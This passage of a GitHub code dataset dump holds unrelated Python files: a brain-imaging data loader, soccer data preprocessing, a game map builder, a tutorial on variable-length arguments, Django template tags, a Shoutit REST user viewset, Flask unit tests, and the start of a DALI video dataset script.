entered\")","repo_name":"satvik423/programing","sub_path":"python/college/B_p4.py","file_name":"B_p4.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7790276996","text":"import numpy as np\nimport torch\nfrom sklearn import preprocessing\nimport pandas as pd\nfrom .preprocess import StandardScaler\nfrom omegaconf import DictConfig, open_dict\n\n\ndef load_pnc_data(cfg: DictConfig):\n\n    ts_data = np.load(cfg.dataset.time_seires, allow_pickle=True)\n    pearson_data = np.load(cfg.dataset.node_feature, allow_pickle=True)\n    label_df = pd.read_csv(cfg.dataset.label)\n\n    pearson_data, timeseries_data = pearson_data.item(), ts_data.item()\n\n    pearson_id = pearson_data['id']\n    pearson_data = pearson_data['data'][:, :, :]\n    id2pearson = dict(zip(pearson_id, pearson_data))\n\n    ts_id = timeseries_data['id']\n    timeseries_data = timeseries_data['data']\n\n    id2gender = dict(zip(label_df['SUBJID'], label_df['sex']))\n\n    final_timeseires, final_label, final_pearson = [], [], []\n\n    for fc, l in zip(timeseries_data, ts_id):\n        if l in id2gender and l in id2pearson:\n            final_timeseires.append(fc)\n            final_label.append(id2gender[l])\n            final_pearson.append(id2pearson[l])\n\n    final_pearson = np.array(final_pearson)\n\n    final_timeseires = np.array(final_timeseires).transpose(0, 2, 1)\n\n    encoder = preprocessing.LabelEncoder()\n\n    encoder.fit(label_df[\"sex\"])\n\n    labels = encoder.transform(final_label)\n\n    # scaler = StandardScaler(mean=np.mean(\n    #     final_timeseires), std=np.std(final_timeseires))\n\n    # final_timeseires = scaler.transform(final_timeseires)\n\n    final_timeseires, final_pearson, labels = [np.array(\n        data) for data in (final_timeseires, final_pearson, labels)]\n\n    final_timeseires, final_pearson, labels = [torch.from_numpy(\n        data).float() for data in (final_timeseires, final_pearson, labels)]\n\n    with open_dict(cfg):\n        cfg.dataset.node_sz, cfg.dataset.node_feature_sz = final_pearson.shape[1:]\n        cfg.dataset.timeseries_sz = final_timeseires.shape[2]\n        
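# node_sz and node_feature_sz come from the square pearson matrices, timeseries_sz is the length of each time series, and num_classes below is taken from the label set\n        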
cfg.dataset.num_classes = labels.unique().shape[0]\n\n    return final_timeseires, final_pearson, labels\n","repo_name":"Wayfear/Dynamic-Brain-Transformer","sub_path":"source/dataset/pnc.py","file_name":"pnc.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6390769370","text":"from goalguru.soccermatch_package import data\nfrom goalguru.params import *\nfrom pathlib import Path\nimport pandas as pd\n\ndef preprocess():\n    \"\"\"\n    - Load raw matches datasets from all leagues matches and events, and from\n    teams and playeranks\n    - Merge matches datasets on teams, events, and playeranks\n    - Stack leagues into a dataset containing all leagues information\n    - Create relevant dataset with features and targets\n    \"\"\"\n\n    processed_data_path = Path(PROCESSED_DATA_PATH).joinpath(SOCCER_PROJECT)\n    data_query_cache_path = Path(processed_data_path).joinpath(f\"{SOCCER_PROJECT}-matches_processed.csv\")\n    if not data_query_cache_path.is_file():\n        matches, events, playerank, teams = data.load_data()\n\n        all_matches = data.merge_data(matches,\n                            events,\n                            playerank,\n                            teams)\n\n        all_matches = data.create_features(all_matches)\n\n        matches_cleaned = data.clean_data(all_matches)\n\n        X = matches_cleaned[FEATURES]\n        y = matches_cleaned[TARGET]\n\n        data.save_data(matches_cleaned,\n                    f'{SOCCER_PROJECT}-matches_processed.csv',\n                    processed_data_path,\n                    'Saved processed matches locally')\n        data.save_data(X,\n                    f'{SOCCER_PROJECT}-X_processed.csv',\n                    processed_data_path,\n                    'Saved X processed locally')\n        data.save_data(y,\n                    f'{SOCCER_PROJECT}-y_processed.csv',\n                    processed_data_path,\n                    'Saved y processed locally')\n    else:\n        print(f\"✅ Data processed already\")\n","repo_name":"jotanavarrete/goalguru","sub_path":"goalguru/interface/main_copy.py","file_name":"main_copy.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14044074920","text":"from config import *\n\n\"\"\"\nVaiman Angelina 28.12.2021. Created the create_map function\n\nPavlov Timur 29.12.2021. Slightly reworked the create_map function\n\nVaiman Angelina 03.01.2022. Created the create_minimap function\n\nBattalov Arslan 03.01.2022. Added the collision map\n\nBattalov Arslan 08.01.2022. Added support for different wall textures\n\nPavlov Timur 08.01.2021. Created the create_sprites_map method\n\"\"\"\n\n\ndef create_map(map_):\n    WORLD_MAP.clear()\n    for row_index, row in enumerate(map_):\n        for col_index, el in enumerate(row):\n            if el in WALL_CHARS:\n                x, y = col_index * TILE, row_index * TILE\n                WORLD_MAP[(x, y)] = el\n\n\ndef create_minimap(map_):\n    MINI_MAP.clear()\n    for row_index, row in enumerate(map_):\n        for col_index, el in enumerate(row):\n            if el in WALL_CHARS:\n                x, y = col_index * MAP_TILE, row_index * MAP_TILE\n                MINI_MAP.add((x, y))\n","repo_name":"OCCCAS/YOOM","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20846062720","text":"# Variable Length Parameters (or) arguments\n__Properties = '''When we have a family of multiple function calls with a Variable number of values / arguments, then \nwith normal python programming, we must define multiple function definitions. This process leads to more\ndevelopment time. 
\n\nTo overcome this process, we must use the concept of Variable length Parameters.\n\nTo implement the Variable length Parameters concept, we must define a single Function Definition that takes a formal Parameter \npreceded with a symbol called asterisk ( *param ), and the formal parameter with the asterisk symbol is called a Variable length \nParameter, whose purpose is to hold / store any number of values coming from similar function calls and whose type \nis <class 'tuple'>.\n\n---------------------------------------------------------------------------------------------------\nSyntax for a function definition with Variable Length Parameters:\n--------------------------------------------------------------------------------------------------\n\tdef functionname(list of formal params, *param1,param2=value) :\n\t    --------------------------------------------------\n\t\t--------------------------------------------------\n\nHere *param1 is called a Variable Length parameter and it can hold any number of argument values (or) a variable number of \nargument values, and *param1's type is <class 'tuple'>\n\nRule:- The *param1 must always be written at the last part of the Function Heading and there must be only one (not multiple)\n\nRule:- When we use Variable length and default parameters in a function Heading, we write the default parameter last, \nafter the variable length parameter, and in function calls we should not pass the default parameter as a Keyword argument \nbecause the Variable number of values are treated as Positional Argument Value(s).'''\n\n# Example:\n\n# Program for demonstrating variable Length arguments\n'''This Program will not execute as it is, because the PVM remembers the Latest Function definition only (the PVM performs an Interpretation \nProcess).'''\ndef disp(a,b,c,d,e): # Function Def-1\n\tprint(a,b,c,d,e)\n\ndef disp(a,b,c,d): # Function Def-2\n\tprint(a,b,c,d)\n\ndef disp(a,b,c): # Function Def-3\n\tprint(a,b,c)\n\ndef disp(a,b): # Function Def-4\n\tprint(a,b)\n\ndef disp(a): # Function Def-5\n\tprint(a)\n\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n# Program for demonstrating variable Length arguments\n# This Program will execute as it is\ndef diplay(a, b, c, d, e):\n    print(a, b, c, d, e)\n\ndiplay(10, 20, 30, 40, 50)\n\ndef diplay(a, b, c, d):\n    print(a, b, c, d)\n\ndiplay(10, 20, 30, 40)\n\ndef diplay(a, b, c):\n    print(a, b, c)\n\ndiplay(10, 20, 30)\n\ndef diplay(a, b):\n    print(a, b)\n\ndiplay(10, 20)\n\ndef diplay(a):\n    print(a)\n\ndiplay(10)\n\n\n# Program for demonstrating variable Length arguments\ndef disp(*a): # here *a is called variable Length Param and whose type is <class 'tuple'>\n    print(a, type(a))\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n# Program for demonstrating variable Length arguments\ndef disp(*a): # here *a is called variable Length Param and whose type is <class 'tuple'>\n    print(\"-\"*100)\n    print(\"Number of Values = {}\".format(len(a)))\n    print(\"-\"*100)\n    for val in a:\n        print(val,type(val))\n    print(\"-\"*100)\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n\n# Program for demonstrating variable Length arguments\ndef display(sno, subname, *val): # here *val is called variable Length Param and whose type is <class 'tuple'>\n    
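# Note: callers may also unpack an existing sequence into the var-args slot;\n    # e.g. display(700, \"GO\", *[10, 20, 30]) passes 10, 20 and 30 as three separate values.\n    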
print(\"-\"*90)\n print(\"Student Number = {}\".format(sno))\n print(\"Subject Name = {}\".format(subname))\n print(\"-\"*90)\n s = 0\n for i in val:\n print(\"\\t{}\".format(i))\n s = s + i\n print(\"-\" * 90)\n print(\"\\tSum = {}\".format(s))\n print(\"-\" * 90)\n# Main Program\ndisplay(100, \"PYTHON\", 10, 20, 30, 40, 50) # Function Call-1 with 5 args\ndisplay(200, \"JAVA\", 10, 20, 30, 40) # Function Call-2 with 4 args\ndisplay(300, \"C++\", 10, 20, 30) # Function Call-3 with 3 args\ndisplay(400, \"C\", 10, 20) # Function Call-4 with 2 args\ndisplay(500, \"C#.net\", 10) # Function Call-5 with 1 args\ndisplay(600, \"JAVA Script\") # Function Call-6 with no args\n\n\n# Program for demonstrating variable Length arguments\ndef disp(pno, pname, *vals, pgun = \"AK-47\"):\n print(\"-\"*70)\n print(\"Player Number = {}\".format(pno))\n print(\"Player Name = {}\".format(pname))\n print(\"Player Gun = {}\".format(pgun))\n print(\"-\" * 70)\n s = 0\n for val in vals:\n print(\"\\t{}\".format(val))\n s = s + val\n print(\"-\" * 70)\n print(\"\\tSum = {}\".format(s))\n print(\"-\" * 70)\n# Main Program\ndisp(1, \"Maverick\", 10, 20, 30, 40, 50) # Function Call-1 with 5 args\ndisp(2, \"Maniac\", 10, 20, 30, 40) # Function Call-2 with 4 args\ndisp(3, \"Rabel\", 10, 20, 30) # Function Call-3 with 3 args\ndisp(4, \"Vandal\", 10, 20) # Function Call-4 with 2 args\ndisp(5, \"Tex\", 10) # Function Call-5 with 1 args\n\n\n# Program for demonstrating non-variable Length arguments\ndef disp1(a, b, c, d, e): # Function Def-1\n print(a, b, c, d, e)\n\ndef disp2(a, b, c, d): # Function Def-2\n print(a, b, c, d)\n\ndef disp3(a, b, c): # Function Def-3\n print(a, b, c)\n\ndef disp4(a, b): # Function Def-4\n print(a, b)\n\ndef disp5(a): # Function Def-5\n print(a)\n\n#main program\ndisp1(10,20,30,40,50) # Function Call-1\ndisp2(10,20,30,40) # Function Call-2\ndisp3(10,20,30) # Function Call-3\ndisp4(10,20) # Function Call-4\ndisp5(10) # Function Call-5\n\n","repo_name":"1Priyans/PYTHON-","sub_path":"Phase 2/Function in Python/Types of Arguments/Variables Length Parameters (or) arguments.py","file_name":"Variables Length Parameters (or) arguments.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29893990703","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef url_page_replace(request, field, value):\n dict_ = request.GET.copy()\n dict_[field] = str(value)\n return dict_.urlencode()\n\n\n@register.simple_tag\ndef url_order_by(request, **kwargs):\n dict_ = request.GET.copy()\n for k, v in kwargs.items():\n dict_[k] = v\n direction = dict_.get('dir')\n if direction is None:\n direction = dict_.get('default_direction', 'up')\n if direction == 'down':\n direction = 'up'\n elif direction == 'up':\n direction = 'down'\n else:\n direction = ''\n dict_['dir'] = direction\n return dict_.urlencode()\n","repo_name":"nerosketch/djing","sub_path":"djing/templatetags/dpagination.py","file_name":"dpagination.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"75"} +{"seq_id":"43183674767","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\nfrom rest_framework import viewsets, filters, status, mixins\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated\nfrom 
rest_framework.response import Response\nfrom rest_framework.reverse import reverse\nfrom rest_framework_extensions.mixins import DetailSerializerMixin\n\nfrom shoutit.api.permissions import IsOwnerModify, IsOwner\nfrom shoutit.api.v2.views.shout_views import ShoutViewSet\nfrom shoutit.controllers import listen_controller, message_controller, facebook_controller, gplus_controller\nfrom shoutit.models import User, ShoutIndex\nfrom . import DEFAULT_PARSER_CLASSES_v2\nfrom ..filters import HomeFilterBackend\nfrom ..pagination import (ShoutitPaginationMixin, PageNumberIndexPagination, ShoutitPageNumberPaginationNoCount)\nfrom ..serializers import (UserSerializer, UserDetailSerializer, MessageSerializer, ShoutSerializer,\n TagDetailSerializer, UserDeactivationSerializer)\n\n\nclass UserViewSet(DetailSerializerMixin, ShoutitPaginationMixin, mixins.ListModelMixin, viewsets.GenericViewSet):\n \"\"\"\n User API Resource.\n \"\"\"\n lookup_field = 'username'\n lookup_value_regex = '[0-9a-zA-Z._]+'\n parser_classes = DEFAULT_PARSER_CLASSES_v2\n serializer_class = UserSerializer\n serializer_detail_class = UserDetailSerializer\n queryset = User.objects.filter(is_active=True, is_activated=True)\n queryset_detail = User.objects.filter(is_active=True).select_related('profile', 'page')\n pagination_class = ShoutitPageNumberPaginationNoCount\n filter_backends = (filters.DjangoFilterBackend, filters.SearchFilter)\n filter_fields = ('username', 'email')\n search_fields = ('=id', 'username', 'first_name', 'last_name', '=email')\n permission_classes = (IsAuthenticatedOrReadOnly, IsOwnerModify)\n\n def get_object(self):\n username = self.kwargs.get(self.lookup_field)\n if self.request.user.is_authenticated():\n if username == 'me' or username == self.request.user.username:\n return self.request.user\n return super(UserViewSet, self).get_object()\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n List Users based on `search` query param\n\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer}\n        }\n        
\n ---\n serializer: UserSerializer\n parameters:\n - name: search\n paramType: query\n \"\"\"\n return super(UserViewSet, self).list(request, *args, **kwargs)\n\n def retrieve(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a User\n ---\n serializer: UserDetailSerializer\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n \"\"\"\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\"\n Modify a User\n ###REQUIRES AUTH\n ###Request\n Specify any or all of these attributes to change them.\n ####Body\n
\n        {\n            \"username\": \"mo\",\n            \"email\": \"mo.chawich@gmail.com\",\n            \"website\": \"https://www.shoutit.com\",\n            \"first_name\": \"Mo\",\n            \"last_name\": \"Chawich\",\n            \"bio\": \"I'm a good shouter\",\n            \"gender\": \"male\",\n            \"image\": \"https://user-image.static.shoutit.com/user_uuid-timestamp.jpg\",\n            \"cover\": \"https://user-image.static.shoutit.com/user_uuid-timestamp.jpg\",\n            \"location\": {\n                \"latitude\": 25.1593957,\n                \"longitude\": 55.2338326,\n                \"address\": \"Whatever Street 31\"\n            },\n            \"video\": {\n                \"url\": \"https://shout-image.static.shoutit.com/38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915.mp4\",\n                \"thumbnail_url\": \"https://shout-image.static.shoutit.com/38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915_thumbnail.jpg\",\n                \"provider\": \"shoutit_s3\",\n                \"id_on_provider\": \"38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915\",\n                \"duration\": 12\n            },\n            \"push_tokens\": {\n                \"apns\": \"56yhnjflsdjfirjeoifjsorj4o\",\n                \"gcm\": \"asjkdhsakjdhi3uhekndkjadkjsak\"\n            }\n        }\n        
\n\n For `location` it is enough to pass `latitude` and `longitude` and the other location attributes such as:\n `country`, `state`, `city`, `postal_code` and `address` will be automatically filled by the API. Passing `address`\n will override the auto-filled one by server. `address` can be also sent alone, this way only saved address will be replaced not other attributes.\n\n ###Deleting video and/or push_tokens\n Set them as `null`\n ####Body\n
\n        {\n            \"video\": null,\n            \"push_tokens\": {\n                \"apns\": null,\n                \"gcm\": null\n            }\n        }\n        
\n ---\n serializer: UserDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: body\n paramType: body\n \"\"\"\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n \"\"\"\n Delete a User and everything attached to him\n ###REQUIRES AUTH\n ```\n NOT IMPLEMENTED AND ONLY USED FOR TEST USERS\n ```\n ---\n omit_serializer: true\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n \"\"\"\n user = self.get_object()\n if user.is_test:\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(status=status.HTTP_406_NOT_ACCEPTABLE)\n\n @detail_route(methods=['post', 'delete'], permission_classes=(IsAuthenticatedOrReadOnly,), suffix='Listen')\n def listen(self, request, *args, **kwargs):\n \"\"\"\n Start/Stop listening to a User\n ###REQUIRES AUTH\n ###Start listening\n
\n        POST: /v2/users/{username}/listen\n        
\n\n ###Stop listening\n
\n        DELETE: /v2/users/{username}/listen\n        
\n ---\n omit_serializer: true\n omit_parameters:\n - form\n \"\"\"\n user = self.get_object()\n ap = user.ap\n api_client = getattr(request, 'api_client', None)\n\n if request.user == user:\n raise ValidationError({'error': \"You can not listen to your self\"})\n\n if request.method == 'POST':\n listen_controller.listen_to_object(request.user, ap, api_client=api_client, api_version=request.version)\n msg = \"you started listening to {} shouts\".format(user.name)\n _status = status.HTTP_201_CREATED\n else:\n listen_controller.stop_listening_to_object(request.user, ap)\n msg = \"you stopped listening to {} shouts\".format(user.name)\n _status = status.HTTP_202_ACCEPTED\n ret = {\n 'data': {'success': msg},\n 'status': _status\n }\n return Response(**ret)\n\n @detail_route(methods=['get'], suffix='Listeners')\n def listeners(self, request, *args, **kwargs):\n \"\"\"\n List the User listeners\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer}\n        }\n        
\n ---\n serializer: UserSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n user = self.get_object()\n listeners = listen_controller.get_object_listeners(user.ap)\n page = self.paginate_queryset(listeners)\n serializer = UserSerializer(page, many=True, context={'request': request})\n return self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], suffix='Listening')\n def listening(self, request, *args, **kwargs):\n \"\"\"\n List the User listening based on `type` query param. It could be either 'users' or 'tags', default is 'users'\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer} same as in listeners or {TagDetailSerializer}\n        }\n        
\n\n ---\n serializer: TagDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: type\n description:\n paramType: query\n required: true\n defaultValue: users\n enum:\n - users\n - pages\n - tags\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n\n listening_type = request.query_params.get('type', 'users')\n if listening_type not in ['users', 'pages', 'tags']:\n raise ValidationError({'type': \"should be `users`, `pages` or `tags`\"})\n\n user = self.get_object()\n listening = getattr(user, 'listening2_' + listening_type)\n\n # we do not use the view pagination class since we need one with custom results field\n self.pagination_class = self.get_custom_shoutit_page_number_pagination_class(\n custom_results_field=listening_type)\n page = self.paginate_queryset(listening)\n\n result_object_serializers = {\n 'users': UserSerializer,\n 'pages': UserSerializer,\n 'tags': TagDetailSerializer,\n }\n result_object_serializer = result_object_serializers[listening_type]\n serializer = result_object_serializer(page, many=True, context={'request': request})\n\n return self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], permission_classes=(IsAuthenticated, IsOwner), suffix='Home')\n def home(self, request, *args, **kwargs):\n \"\"\"\n List the User homepage shouts. User can't see the homepage of other users.\n [Shouts Pagination](https://docs.google.com/document/d/1Zp9Ks3OwBQbgaDRqaULfMDHB-eg9as6_wHyvrAWa8u0/edit#heading=h.97r3lxfv95pj)\n ###REQUIRES AUTH\n ---\n serializer: ShoutSerializer\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n setattr(self, 'get_queryset', ShoutViewSet().get_queryset)\n shouts = HomeFilterBackend().filter_queryset(request=request, index_queryset=ShoutIndex.search(), view=self)\n paginator = PageNumberIndexPagination()\n page = paginator.paginate_queryset(index_queryset=shouts, request=request, view=self)\n serializer = ShoutSerializer(page, many=True, context={'request': request})\n return paginator.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], suffix='Shouts')\n def shouts(self, request, *args, **kwargs):\n \"\"\"\n List the User shouts.\n [Shouts Pagination](https://docs.google.com/document/d/1Zp9Ks3OwBQbgaDRqaULfMDHB-eg9as6_wHyvrAWa8u0/edit#heading=h.97r3lxfv95pj)\n ---\n serializer: ShoutSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: shout_type\n paramType: query\n defaultValue: all\n enum:\n - request\n - offer\n - all\n - name: page_size\n paramType: query\n \"\"\"\n user = self.get_object()\n shout_type = request.query_params.get('shout_type', 'all')\n if shout_type not in ['offer', 'request', 'all']:\n raise ValidationError({'shout_type': \"should be `offer`, `request` or `all`\"})\n\n self.pagination_class = PageNumberIndexPagination\n setattr(self, 'get_queryset', ShoutViewSet().get_queryset)\n shouts = ShoutIndex.search().filter('term', uid=user.pk).sort('-published_at')\n if shout_type != 'all':\n shouts = shouts.query('match', type=shout_type)\n\n page = self.paginate_queryset(shouts)\n serializer = ShoutSerializer(page, many=True, context={'request': request})\n return 
self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['post'], suffix='Message')\n def message(self, request, *args, **kwargs):\n \"\"\"\n Send the User a message\n ###REQUIRES AUTH\n > A user can only message his Listeners, or someone whom he already has an existing conversation with.\n ###Request\n
\n        {\n            \"text\": \"text goes here\",\n            \"attachments\": [\n                {\n                    \"shout\": {\n                        \"id\": \"\"\n                    }\n                },\n                {\n                    \"location\": {\n                        \"latitude\": 12.345,\n                        \"longitude\": 12.345\n                    }\n                },\n                {\n                    \"images\": [], // list of image urls\n                    \"videos\": [] // list of {Video Object}s\n                }\n            ]\n        }\n        
\n ---\n response_serializer: MessageSerializer\n omit_parameters:\n - form\n parameters:\n - name: body\n paramType: body\n \"\"\"\n user = self.get_object()\n logged_user = request.user\n if logged_user == user:\n raise ValidationError({'error': \"You can not start a conversation with your self\"})\n if not (message_controller.conversation_exist(users=[user, logged_user]) or user.is_listening(logged_user)):\n raise ValidationError({'error': \"You can only start a conversation with your listeners\"})\n context = {\n 'request': request,\n 'conversation': None,\n 'to_users': [user]\n }\n serializer = MessageSerializer(data=request.data, partial=False, context=context)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n headers = self.get_success_message_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def get_success_message_headers(self, data):\n loc = reverse('conversation-messages', kwargs={'id': data['conversation_id']}, request=self.request)\n return {'Location': loc}\n\n @detail_route(methods=['post', 'patch', 'delete'], suffix='Link / Unlink Accounts')\n def link(self, request, *args, **kwargs):\n \"\"\"\n Link/Unlink external social accounts\n ###REQUIRES AUTH\n\n ###Link Facebook\n
\n        PATCH: /v2/users/{username}/link\n        {\n            \"account\": \"facebook\",\n            \"facebook_access_token\": \"FACEBOOK_ACCESS_TOKEN\"\n        }\n        
\n\n ###Unlink Facebook\n
\n        DELETE: /v2/users/{username}/link\n        {\n            \"account\": \"facebook\"\n        }\n        
\n\n ###Link G+\n
\n        PATCH: /v2/users/{username}/link\n        {\n            \"account\": \"gplus\",\n            \"gplus_code\": \"GOOGLE_GRANT_CODE\"\n        }\n        
\n\n ###Unlink G+\n
\n        DELETE: /v2/users/{username}/link\n        {\n            \"account\": \"gplus\"\n        }\n        
\n ---\n serializer: UserDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: body\n paramType: body\n \"\"\"\n user = self.get_object()\n account = request.data.get('account') or request.query_params.get('account')\n if not account:\n raise ValidationError({'account': \"This field is required\"})\n if account not in ['facebook', 'gplus']:\n raise ValidationError({'account': \"Unsupported social account\"})\n\n if request.method in ['PATCH', 'POST']:\n if account == 'gplus':\n gplus_code = request.data.get('gplus_code')\n if not gplus_code:\n raise ValidationError({'gplus_code': \"provide a valid `gplus_code`\"})\n client = hasattr(request.auth, 'client') and request.auth.client.name or None\n gplus_controller.link_gplus_account(user, gplus_code, client)\n\n elif account == 'facebook':\n facebook_access_token = request.data.get('facebook_access_token')\n if not facebook_access_token:\n raise ValidationError({'facebook_access_token': \"provide a valid `facebook_access_token`\"})\n facebook_controller.link_facebook_account(user, facebook_access_token)\n\n else:\n if account == 'gplus':\n gplus_controller.unlink_gplus_user(user)\n\n elif account == 'facebook':\n facebook_controller.unlink_facebook_user(user)\n\n serializer = self.get_serializer(user)\n return Response(serializer.data)\n\n @detail_route(methods=['post'], permission_classes=(IsAuthenticated, IsOwner), suffix=\"Deactivate user's account\")\n def deactivate(self, request, *args, **kwargs):\n \"\"\"\n Deactivate user's account\n ###REQUIRES AUTH, Account owner\n\n ####Body\n
\n        {\n            \"password\": \"current password\"\n        }\n        
\n ---\n omit_serializer: true\n omit_parameters:\n - form\n \"\"\"\n user = self.get_object()\n serializer = UserDeactivationSerializer(data=request.data, context={'user': user})\n serializer.is_valid(raise_exception=True)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"shoutit/shoutit-api","sub_path":"src/shoutit/api/v2/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31325826743","text":"from flask import json\nfrom app import app, db, User\nimport unittest \n\n#unittest.TestCase is a class\nclass TestUsers(unittest.TestCase):\n def setUp(self):\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = '...'\n self.app = app.test_client()\n self.context = app.app_context()\n self.context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n for user in User.query.all():\n db.session.delete(user)\n db.session.commit()\n db.drop_all()\n self.context.pop()\n #creates record in the database\n def test_create_user(self):\n # Send a POST request to create a user\n response = self.app.post('/users', data=json.dumps({'name': 'John', 'email': 'john@example.com'}), content_type='application/json')\n self.assertEqual(response.status_code, 201)\n self.assertEqual(User.query.count(), 1) #problem\n #first creates a user before executing a put request\n def test_update_user(self):\n # Create a user\n user = User(name='John', email='john@example.com')\n db.session.add(user)\n db.session.commit()\n\n # Send a PUT request to update the user\n response = self.app.put(f'/users/{user.id}', data=json.dumps({'name': 'Jane'}), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n\n # Check that the user was updated\n updated_user = User.query.get(user.id)\n self.assertEqual(updated_user.name, 'Jane')\n\n def test_delete_user(self):\n # Create a user\n user = User(name='John', email='john@example.com')\n db.session.add(user)\n db.session.commit()\n\n # Send a GET request to get the user's ID\n response = self.app.get(f'/users/{user.id}')\n self.assertEqual(response.status_code, 200) #problem\n\n # Send a DELETE request to delete the user\n response = self.app.delete(f'/users/{user.id}')\n self.assertEqual(response.status_code, 200)\n\n # Check that the user was deleted\n deleted_user = User.query.get(user.id)\n self.assertIsNone(deleted_user)\n\nif __name__ == '__main__':\n unittest.main()\n \n#To execute the unitest, run = python -m unittest discover -s tests - in the VSCode terminal\n#documentation here: https://docs.python.org/3/library/unittest.html\n","repo_name":"owenwu811/Flask-PostGreSQL","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19347181344","text":"import os\n\nimport tensorflow as tf\n\nimport config as config\nfrom dali_dataset import get_dali_dataset\n\n\ndef get_dataset() -> tf.data.Dataset:\n \"\"\"\n Create test Tensorflow dataset.\n\n :return: Tensorflow dataset\n \"\"\"\n video_names = [\n '01.mp4',\n '02.mp4',\n '03.mp4',\n '04.mp4',\n '05.mp4',\n '06.mp4',\n '07.mp4',\n '08.mp4',\n '09.mp4',\n '10.mp4']\n labels = [1, 1, 1, 1, 1, 0, 0, 0, 0, 0]\n video_paths = []\n for video_name in video_names:\n video_paths.append(os.path.join(config.BASE_DIR, 'dali_test_sample', video_name))\n\n dataset = 
